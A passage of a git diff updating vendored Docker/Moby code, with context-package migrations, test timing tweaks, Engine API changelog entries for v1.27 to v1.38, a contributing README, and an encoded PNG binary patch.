time.NewTicker(lum.waitDuration) selectLoop: for { diff --git a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go index 16bd187336..4507feac7b 100644 --- a/vendor/github.com/docker/docker/distribution/xfer/upload_test.go +++ b/vendor/github.com/docker/docker/distribution/xfer/upload_test.go @@ -1,6 +1,7 @@ -package xfer +package xfer // import "github.com/docker/docker/distribution/xfer" import ( + "context" "errors" "sync/atomic" "testing" @@ -9,7 +10,6 @@ import ( "github.com/docker/distribution" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "golang.org/x/net/context" ) const maxUploadConcurrency = 3 @@ -79,7 +79,7 @@ func uploadDescriptors(currentUploads *int32) []UploadDescriptor { } func TestSuccessfulUpload(t *testing.T) { - lum := NewLayerUploadManager(maxUploadConcurrency) + lum := NewLayerUploadManager(maxUploadConcurrency, func(m *LayerUploadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) @@ -105,7 +105,7 @@ func TestSuccessfulUpload(t *testing.T) { } func TestCancelledUpload(t *testing.T) { - lum := NewLayerUploadManager(maxUploadConcurrency) + lum := NewLayerUploadManager(maxUploadConcurrency, func(m *LayerUploadManager) { m.waitDuration = time.Millisecond }) progressChan := make(chan progress.Progress) progressDone := make(chan struct{}) diff --git a/vendor/github.com/docker/docker/dockerversion/useragent.go b/vendor/github.com/docker/docker/dockerversion/useragent.go index d2a891c4d6..2eceb6fa9e 100644 --- a/vendor/github.com/docker/docker/dockerversion/useragent.go +++ b/vendor/github.com/docker/docker/dockerversion/useragent.go @@ -1,15 +1,17 @@ -package dockerversion +package dockerversion // import "github.com/docker/docker/dockerversion" import ( + "context" "fmt" "runtime" - "github.com/docker/docker/api/server/httputils" "github.com/docker/docker/pkg/parsers/kernel" "github.com/docker/docker/pkg/useragent" - "golang.org/x/net/context" ) +// UAStringKey is used as key type for user-agent string in net/context struct +const UAStringKey = "upstream-user-agent" + // DockerUserAgent is the User-Agent the Docker client uses to identify itself. // In accordance with RFC 7231 (5.5.3) is of the form: // [docker client's UA] UpstreamClient([upstream client's UA]) @@ -37,9 +39,9 @@ func DockerUserAgent(ctx context.Context) string { func getUserAgentFromContext(ctx context.Context) string { var upstreamUA string if ctx != nil { - var ki interface{} = ctx.Value(httputils.UAStringKey) + var ki interface{} = ctx.Value(UAStringKey) if ki != nil { - upstreamUA = ctx.Value(httputils.UAStringKey).(string) + upstreamUA = ctx.Value(UAStringKey).(string) } } return upstreamUA @@ -50,8 +52,8 @@ func escapeStr(s string, charsToEscape string) string { var ret string for _, currRune := range s { appended := false - for _, escapeableRune := range charsToEscape { - if currRune == escapeableRune { + for _, escapableRune := range charsToEscape { + if currRune == escapableRune { ret += `\` + string(currRune) appended = true break diff --git a/vendor/github.com/docker/docker/dockerversion/version_lib.go b/vendor/github.com/docker/docker/dockerversion/version_lib.go index 33f77d3ce6..0897c0728e 100644 --- a/vendor/github.com/docker/docker/dockerversion/version_lib.go +++ b/vendor/github.com/docker/docker/dockerversion/version_lib.go @@ -1,16 +1,17 @@ // +build !autogen // Package dockerversion is auto-generated at build-time -package dockerversion +package dockerversion // import "github.com/docker/docker/dockerversion" // Default build-time variable for library-import. // This file is overridden on build with build-time informations. const ( - GitCommit string = "library-import" - Version string = "library-import" - BuildTime string = "library-import" - IAmStatic string = "library-import" - ContainerdCommitID string = "library-import" - RuncCommitID string = "library-import" - InitCommitID string = "library-import" + GitCommit = "library-import" + Version = "library-import" + BuildTime = "library-import" + IAmStatic = "library-import" + ContainerdCommitID = "library-import" + RuncCommitID = "library-import" + InitCommitID = "library-import" + PlatformName = "" ) diff --git a/vendor/github.com/docker/docker/docs/README.md b/vendor/github.com/docker/docker/docs/README.md deleted file mode 100644 index da93093075..0000000000 --- a/vendor/github.com/docker/docker/docs/README.md +++ /dev/null @@ -1,30 +0,0 @@ -# The non-reference docs have been moved! - - - -The documentation for Docker Engine has been merged into -[the general documentation repo](https://github.com/docker/docker.github.io). - -See the [README](https://github.com/docker/docker.github.io/blob/master/README.md) -for instructions on contributing to and building the documentation. - -If you'd like to edit the current published version of the Engine docs, -do it in the master branch here: -https://github.com/docker/docker.github.io/tree/master/engine - -If you need to document the functionality of an upcoming Engine release, -use the `vnext-engine` branch: -https://github.com/docker/docker.github.io/tree/vnext-engine/engine - -The reference docs have been left in docker/docker (this repo), which remains -the place to edit them. - -The docs in the general repo are open-source and we appreciate -your feedback and pull requests! diff --git a/vendor/github.com/docker/docker/docs/api/v1.18.md b/vendor/github.com/docker/docker/docs/api/v1.18.md index 0db0c0f916..327701427a 100644 --- a/vendor/github.com/docker/docker/docs/api/v1.18.md +++ b/vendor/github.com/docker/docker/docs/api/v1.18.md @@ -7,8 +7,8 @@ redirect_from: - /reference/api/docker_remote_api_v1.18/ --- - +## V1.38 API changes + +[Docker Engine API v1.38](https://docs.docker.com/engine/api/v1.38/) documentation + + +* `GET /tasks` and `GET /tasks/{id}` now return a `NetworkAttachmentSpec` field, + containing the `ContainerID` for non-service containers connected to "attachable" + swarm-scoped networks. + +## v1.37 API changes + +[Docker Engine API v1.37](https://docs.docker.com/engine/api/v1.37/) documentation + +* `POST /containers/create` and `POST /services/create` now supports exposing SCTP ports. +* `POST /configs/create` and `POST /configs/{id}/create` now accept a `Templating` driver. +* `GET /configs` and `GET /configs/{id}` now return the `Templating` driver of the config. +* `POST /secrets/create` and `POST /secrets/{id}/create` now accept a `Templating` driver. +* `GET /secrets` and `GET /secrets/{id}` now return the `Templating` driver of the secret. + +## v1.36 API changes + +[Docker Engine API v1.36](https://docs.docker.com/engine/api/v1.36/) documentation + +* `Get /events` now return `exec_die` event when an exec process terminates. + + +## v1.35 API changes + +[Docker Engine API v1.35](https://docs.docker.com/engine/api/v1.35/) documentation + +* `POST /services/create` and `POST /services/(id)/update` now accepts an + `Isolation` field on container spec to set the Isolation technology of the + containers running the service (`default`, `process`, or `hyperv`). This + configuration is only used for Windows containers. +* `GET /containers/(name)/logs` now supports an additional query parameter: `until`, + which returns log lines that occurred before the specified timestamp. +* `POST /containers/{id}/exec` now accepts a `WorkingDir` property to set the + work-dir for the exec process, independent of the container's work-dir. +* `Get /version` now returns a `Platform.Name` field, which can be used by products + using Moby as a foundation to return information about the platform. +* `Get /version` now returns a `Components` field, which can be used to return + information about the components used. Information about the engine itself is + now included as a "Component" version, and contains all information from the + top-level `Version`, `GitCommit`, `APIVersion`, `MinAPIVersion`, `GoVersion`, + `Os`, `Arch`, `BuildTime`, `KernelVersion`, and `Experimental` fields. Going + forward, the information from the `Components` section is preferred over their + top-level counterparts. + + +## v1.34 API changes + +[Docker Engine API v1.34](https://docs.docker.com/engine/api/v1.34/) documentation + +* `POST /containers/(name)/wait?condition=removed` now also also returns + in case of container removal failure. A pointer to a structure named + `Error` added to the response JSON in order to indicate a failure. + If `Error` is `null`, container removal has succeeded, otherwise + the test of an error message indicating why container removal has failed + is available from `Error.Message` field. + +## v1.33 API changes + +[Docker Engine API v1.33](https://docs.docker.com/engine/api/v1.33/) documentation + +* `GET /events` now supports filtering 4 more kinds of events: `config`, `node`, +`secret` and `service`. + +## v1.32 API changes + +[Docker Engine API v1.32](https://docs.docker.com/engine/api/v1.32/) documentation + +* `POST /containers/create` now accepts additional values for the + `HostConfig.IpcMode` property. New values are `private`, `shareable`, + and `none`. +* `DELETE /networks/{id or name}` fixed issue where a `name` equal to another + network's name was able to mask that `id`. If both a network with the given + _name_ exists, and a network with the given _id_, the network with the given + _id_ is now deleted. This change is not versioned, and affects all API versions + if the daemon has this patch. + +## v1.31 API changes + +[Docker Engine API v1.31](https://docs.docker.com/engine/api/v1.31/) documentation + +* `DELETE /secrets/(name)` now returns status code 404 instead of 500 when the secret does not exist. +* `POST /secrets/create` now returns status code 409 instead of 500 when creating an already existing secret. +* `POST /secrets/create` now accepts a `Driver` struct, allowing the + `Name` and driver-specific `Options` to be passed to store a secrets + in an external secrets store. The `Driver` property can be omitted + if the default (internal) secrets store is used. +* `GET /secrets/(id)` and `GET /secrets` now return a `Driver` struct, + containing the `Name` and driver-specific `Options` of the external + secrets store used to store the secret. The `Driver` property is + omitted if no external store is used. +* `POST /secrets/(name)/update` now returns status code 400 instead of 500 when updating a secret's content which is not the labels. +* `POST /nodes/(name)/update` now returns status code 400 instead of 500 when demoting last node fails. +* `GET /networks/(id or name)` now takes an optional query parameter `scope` that will filter the network based on the scope (`local`, `swarm`, or `global`). +* `POST /session` is a new endpoint that can be used for running interactive long-running protocols between client and + the daemon. This endpoint is experimental and only available if the daemon is started with experimental features + enabled. +* `GET /images/(name)/get` now includes an `ImageMetadata` field which contains image metadata that is local to the engine and not part of the image config. +* `POST /services/create` now accepts a `PluginSpec` when `TaskTemplate.Runtime` is set to `plugin` +* `GET /events` now supports config events `create`, `update` and `remove` that are emitted when users create, update or remove a config +* `GET /volumes/` and `GET /volumes/{name}` now return a `CreatedAt` field, + containing the date/time the volume was created. This field is omitted if the + creation date/time for the volume is unknown. For volumes with scope "global", + this field represents the creation date/time of the local _instance_ of the + volume, which may differ from instances of the same volume on different nodes. +* `GET /system/df` now returns a `CreatedAt` field for `Volumes`. Refer to the + `/volumes/` endpoint for a description of this field. + +## v1.30 API changes + +[Docker Engine API v1.30](https://docs.docker.com/engine/api/v1.30/) documentation + +* `GET /info` now returns the list of supported logging drivers, including plugins. +* `GET /info` and `GET /swarm` now returns the cluster-wide swarm CA info if the node is in a swarm: the cluster root CA certificate, and the cluster TLS + leaf certificate issuer's subject and public key. It also displays the desired CA signing certificate, if any was provided as part of the spec. +* `POST /build/` now (when not silent) produces an `Aux` message in the JSON output stream with payload `types.BuildResult` for each image produced. The final such message will reference the image resulting from the build. +* `GET /nodes` and `GET /nodes/{id}` now returns additional information about swarm TLS info if the node is part of a swarm: the trusted root CA, and the + issuer's subject and public key. +* `GET /distribution/(name)/json` is a new endpoint that returns a JSON output stream with payload `types.DistributionInspect` for an image name. It includes a descriptor with the digest, and supported platforms retrieved from directly contacting the registry. +* `POST /swarm/update` now accepts 3 additional parameters as part of the swarm spec's CA configuration; the desired CA certificate for + the swarm, the desired CA key for the swarm (if not using an external certificate), and an optional parameter to force swarm to + generate and rotate to a new CA certificate/key pair. +* `POST /service/create` and `POST /services/(id or name)/update` now take the field `Platforms` as part of the service `Placement`, allowing to specify platforms supported by the service. +* `POST /containers/(name)/wait` now accepts a `condition` query parameter to indicate which state change condition to wait for. Also, response headers are now returned immediately to acknowledge that the server has registered a wait callback for the client. +* `POST /swarm/init` now accepts a `DataPathAddr` property to set the IP-address or network interface to use for data traffic +* `POST /swarm/join` now accepts a `DataPathAddr` property to set the IP-address or network interface to use for data traffic +* `GET /events` now supports service, node and secret events which are emitted when users create, update and remove service, node and secret +* `GET /events` now supports network remove event which is emitted when users remove a swarm scoped network +* `GET /events` now supports a filter type `scope` in which supported value could be swarm and local + +## v1.29 API changes + +[Docker Engine API v1.29](https://docs.docker.com/engine/api/v1.29/) documentation + +* `DELETE /networks/(name)` now allows to remove the ingress network, the one used to provide the routing-mesh. +* `POST /networks/create` now supports creating the ingress network, by specifying an `Ingress` boolean field. As of now this is supported only when using the overlay network driver. +* `GET /networks/(name)` now returns an `Ingress` field showing whether the network is the ingress one. +* `GET /networks/` now supports a `scope` filter to filter networks based on the network mode (`swarm`, `global`, or `local`). +* `POST /containers/create`, `POST /service/create` and `POST /services/(id or name)/update` now takes the field `StartPeriod` as a part of the `HealthConfig` allowing for specification of a period during which the container should not be considered unhealthy even if health checks do not pass. +* `GET /services/(id)` now accepts an `insertDefaults` query-parameter to merge default values into the service inspect output. +* `POST /containers/prune`, `POST /images/prune`, `POST /volumes/prune`, and `POST /networks/prune` now support a `label` filter to filter containers, images, volumes, or networks based on the label. The format of the label filter could be `label=`/`label==` to remove those with the specified labels, or `label!=`/`label!==` to remove those without the specified labels. +* `POST /services/create` now accepts `Privileges` as part of `ContainerSpec`. Privileges currently include + `CredentialSpec` and `SELinuxContext`. + +## v1.28 API changes + +[Docker Engine API v1.28](https://docs.docker.com/engine/api/v1.28/) documentation + +* `POST /containers/create` now includes a `Consistency` field to specify the consistency level for each `Mount`, with possible values `default`, `consistent`, `cached`, or `delegated`. +* `GET /containers/create` now takes a `DeviceCgroupRules` field in `HostConfig` allowing to set custom device cgroup rules for the created container. +* Optional query parameter `verbose` for `GET /networks/(id or name)` will now list all services with all the tasks, including the non-local tasks on the given network. +* `GET /containers/(id or name)/attach/ws` now returns WebSocket in binary frame format for API version >= v1.28, and returns WebSocket in text frame format for API version< v1.28, for the purpose of backward-compatibility. +* `GET /networks` is optimised only to return list of all networks and network specific information. List of all containers attached to a specific network is removed from this API and is only available using the network specific `GET /networks/{network-id}. +* `GET /containers/json` now supports `publish` and `expose` filters to filter containers that expose or publish certain ports. +* `POST /services/create` and `POST /services/(id or name)/update` now accept the `ReadOnly` parameter, which mounts the container's root filesystem as read only. +* `POST /build` now accepts `extrahosts` parameter to specify a host to ip mapping to use during the build. +* `POST /services/create` and `POST /services/(id or name)/update` now accept a `rollback` value for `FailureAction`. +* `POST /services/create` and `POST /services/(id or name)/update` now accept an optional `RollbackConfig` object which specifies rollback options. +* `GET /services` now supports a `mode` filter to filter services based on the service mode (either `global` or `replicated`). +* `POST /containers/(name)/update` now supports updating `NanoCPUs` that represents CPU quota in units of 10-9 CPUs. + +## v1.27 API changes + +[Docker Engine API v1.27](https://docs.docker.com/engine/api/v1.27/) documentation + +* `GET /containers/(id or name)/stats` now includes an `online_cpus` field in both `precpu_stats` and `cpu_stats`. If this field is `nil` then for compatibility with older daemons the length of the corresponding `cpu_usage.percpu_usage` array should be used. + ## v1.26 API changes [Docker Engine API v1.26](https://docs.docker.com/engine/api/v1.26/) documentation @@ -83,6 +253,11 @@ keywords: "API, Docker, rcli, REST, documentation" * `DELETE /secrets/{id}` removes the secret `id`. * `GET /secrets/{id}` returns information on the secret `id`. * `POST /secrets/{id}/update` updates the secret `id`. +* `POST /services/(id or name)/update` now accepts service name or prefix of service id as a parameter. +* `POST /containers/create` added 2 built-in log-opts that work on all logging drivers, + `mode` (`blocking`|`non-blocking`), and `max-buffer-size` (e.g. `2m`) which enables a non-blocking log buffer. +* `POST /containers/create` now takes `HostConfig.Init` field to run an init + inside the container that forwards signals and reaps processes. ## v1.24 API changes diff --git a/vendor/github.com/docker/docker/docs/contributing/README.md b/vendor/github.com/docker/docker/docs/contributing/README.md new file mode 100644 index 0000000000..915c0cff1e --- /dev/null +++ b/vendor/github.com/docker/docker/docs/contributing/README.md @@ -0,0 +1,8 @@ +### Get set up for Moby development + + * [README first](who-written-for.md) + * [Get the required software](software-required.md) + * [Set up for development on Windows](software-req-win.md) + * [Configure Git for contributing](set-up-git.md) + * [Work with a development container](set-up-dev-env.md) + * [Run tests and test documentation](test.md) diff --git a/vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png b/vendor/github.com/docker/docker/docs/contributing/images/branch-sig.png new file mode 100644 index 0000000000000000000000000000000000000000..b069319eeeb7efa7c3f00b5b9d080ce83ffc6654 GIT binary patch literal 56537 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 